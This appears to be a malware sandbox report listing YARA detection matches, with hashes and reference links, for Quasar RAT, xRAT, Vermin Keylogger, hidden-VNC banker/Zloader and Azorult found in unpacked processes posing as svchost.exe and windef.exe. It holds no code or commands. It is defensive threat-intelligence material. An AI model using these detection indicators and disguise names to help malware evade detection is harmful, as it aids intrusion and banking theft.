Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
